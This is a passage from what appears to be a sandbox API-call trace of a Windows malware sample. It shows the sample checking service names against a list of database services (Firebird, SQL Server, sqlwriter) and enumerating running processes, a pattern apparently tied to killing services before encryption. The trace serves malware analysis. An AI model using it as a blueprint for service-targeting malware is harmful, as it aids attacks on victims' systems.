(lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0182.290] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0182.290] lstrlenW (lpString="LanmanWorkstation") returned 17 [0182.290] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0182.290] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0182.291] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0182.291] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0182.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0182.291] lstrlenW (lpString="lfsvc") returned 5 [0182.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0182.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0182.291] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0182.291] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0182.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0182.291] lstrlenW (lpString="lmhosts") returned 7 [0182.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0182.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0182.292] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0182.292] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0182.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0182.292] lstrlenW (lpString="LSM") returned 3 [0182.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0182.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0182.292] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0182.292] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0182.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0182.293] lstrlenW (lpString="MpsSvc") returned 6 [0182.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0182.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0182.293] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0182.293] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0182.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0182.293] lstrlenW (lpString="NcbService") returned 10 [0182.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0182.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0182.293] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0182.293] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0182.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0182.293] lstrlenW (lpString="netprofm") returned 8 [0182.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0182.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0182.293] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0182.293] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0182.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0182.293] lstrlenW (lpString="NlaSvc") returned 6 [0182.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0182.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0182.293] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0182.293] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0182.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0182.293] lstrlenW (lpString="nsi") returned 3 [0182.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0182.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0182.293] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0182.294] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0182.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0182.294] lstrlenW (lpString="PcaSvc") returned 6 [0182.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0182.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0182.294] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0182.294] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0182.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0182.294] lstrlenW (lpString="PlugPlay") returned 8 [0182.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0182.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0182.294] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0182.294] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0182.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0182.294] lstrlenW (lpString="Power") returned 5 [0182.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0182.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0183.038] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0183.038] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0183.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0183.039] lstrlenW (lpString="ProfSvc") returned 7 [0183.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0183.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0183.039] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0183.039] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0183.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0183.039] lstrlenW (lpString="RpcEptMapper") returned 12 [0183.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0183.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0183.039] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0183.039] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0183.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0183.039] lstrlenW (lpString="RpcSs") returned 5 [0183.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0183.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0183.039] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0183.039] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0183.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0183.039] lstrlenW (lpString="SamSs") returned 5 [0183.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0183.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0183.039] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0183.039] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0183.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0183.039] lstrlenW (lpString="Schedule") returned 8 [0183.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0183.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0183.040] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0183.040] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0183.040] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0183.040] lstrlenW (lpString="SecurityHealthService") returned 21 [0183.040] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0183.040] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0183.040] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0183.040] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0183.040] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0183.040] lstrlenW (lpString="SENS") returned 4 [0183.040] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0183.040] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0183.040] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0183.040] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0183.041] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0183.041] lstrlenW (lpString="ShellHWDetection") returned 16 [0183.041] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0183.041] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0183.041] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0183.041] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0183.041] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0183.041] lstrlenW (lpString="Spooler") returned 7 [0183.041] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0183.041] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0183.041] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0183.041] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0183.041] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0183.041] lstrlenW (lpString="sppsvc") returned 6 [0183.041] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0183.041] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0183.041] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0183.041] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0183.041] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0183.041] lstrlenW (lpString="SSDPSRV") returned 7 [0183.041] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0183.042] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0183.042] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0183.042] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0183.042] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0183.042] lstrlenW (lpString="StateRepository") returned 15 [0183.042] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0183.042] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0183.042] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0183.042] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0183.042] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0183.042] lstrlenW (lpString="SysMain") returned 7 [0183.042] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0183.042] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0183.042] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0183.042] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0183.042] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0183.042] lstrlenW (lpString="SystemEventsBroker") returned 18 [0183.042] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0183.042] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0183.042] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0183.043] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0183.043] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x773a68 | out: hHeap=0x710000) returned 1 [0183.142] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x358 [0183.149] Process32FirstW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.150] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0183.150] lstrlenW (lpString="System") returned 6 [0183.151] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0183.151] lstrlenW (lpString="smss.exe") returned 8 [0183.151] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.152] lstrlenW (lpString="csrss.exe") returned 9 [0183.152] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0183.152] lstrlenW (lpString="wininit.exe") returned 11 [0183.153] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.153] lstrlenW (lpString="csrss.exe") returned 9 [0183.153] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0183.154] lstrlenW (lpString="winlogon.exe") returned 12 [0183.154] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0183.154] lstrlenW (lpString="services.exe") returned 12 [0183.154] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0183.155] lstrlenW (lpString="lsass.exe") returned 9 [0183.155] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.156] lstrlenW (lpString="svchost.exe") returned 11 [0183.156] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0183.156] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0183.156] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0183.157] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0183.157] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.157] lstrlenW (lpString="svchost.exe") returned 11 [0183.157] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0183.158] lstrlenW (lpString="dwm.exe") returned 7 [0183.158] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x67, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.158] lstrlenW (lpString="svchost.exe") returned 11 [0183.159] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.159] lstrlenW (lpString="svchost.exe") returned 11 [0183.159] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.160] lstrlenW (lpString="svchost.exe") returned 11 [0183.160] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.160] lstrlenW (lpString="svchost.exe") returned 11 [0183.160] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.161] lstrlenW (lpString="svchost.exe") returned 11 [0183.200] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.201] lstrlenW (lpString="svchost.exe") returned 11 [0183.201] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.201] lstrlenW (lpString="svchost.exe") returned 11 [0183.201] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.202] lstrlenW (lpString="svchost.exe") returned 11 [0183.202] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.203] lstrlenW (lpString="svchost.exe") returned 11 [0183.203] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.203] lstrlenW (lpString="svchost.exe") returned 11 [0183.203] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0183.204] lstrlenW (lpString="spoolsv.exe") returned 11 [0183.204] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.204] lstrlenW (lpString="svchost.exe") returned 11 [0183.205] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0183.205] lstrlenW (lpString="audiodg.exe") returned 11 [0183.205] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0183.206] lstrlenW (lpString="sihost.exe") returned 10 [0183.206] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.206] lstrlenW (lpString="svchost.exe") returned 11 [0183.207] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0183.207] lstrlenW (lpString="taskhostw.exe") returned 13 [0183.207] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.208] lstrlenW (lpString="explorer.exe") returned 12 [0183.208] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0183.208] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0183.209] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0183.209] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0183.209] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0183.210] lstrlenW (lpString="Memory Compression") returned 18 [0183.210] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0183.210] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0183.211] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0183.211] lstrlenW (lpString="SearchUI.exe") returned 12 [0183.211] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0183.807] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0183.807] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.808] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0183.808] Process32NextW (in: 